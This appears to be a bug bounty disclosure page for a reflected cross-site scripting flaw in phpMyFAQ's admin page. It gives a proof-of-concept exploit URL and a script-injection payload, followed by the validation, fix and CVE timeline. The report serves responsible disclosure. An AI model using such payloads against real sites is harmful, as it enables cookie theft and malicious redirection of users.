Reflect Cross Site Scripting in thorsten/phpmyfaq

Valid

Reported on

Nov 26th 2022


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

Go to your web phpmyfaq and visit below URL.

Exploit URL: https://roy.demo.phpmyfaq.de/admin/index.php?action=SEX%22%3E%3CScRiPt%3Ealert(133333337)%3C/ScRiPt%3E

Payload USE:  "><ScRiPt>alert(9699)</ScRiPt>

#YO Maintainer :) Long Time No SEE !

Impact

Attacker can execute javascript, Anyone can steal the cookie, redirect to any URL and other lots of FUN.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. a month ago
thorsten/phpmyfaq maintainer has acknowledged this report a month ago
Thorsten Rinne validated this vulnerability a month ago
AggressiveUser has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne marked this as fixed in 3.1.9 with commit 1d73af a month ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 31st 2022
AggressiveUser
a month ago

Researcher


Hi @maintainer can i have CVE for this valid report :), Allow @admin to do it.

Thorsten Rinne
a month ago

Maintainer


sure

AggressiveUser
a month ago

Researcher


Hi @Admin look in to this :)

Pavlos
a month ago

Admin


As you can see above, a CVE has been assigned and will be published on Dec 31st :))

Thorsten Rinne gave praise a month ago
Thanks, v3.1.9 is now released!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
Thorsten Rinne published this vulnerability a month ago
to join this conversation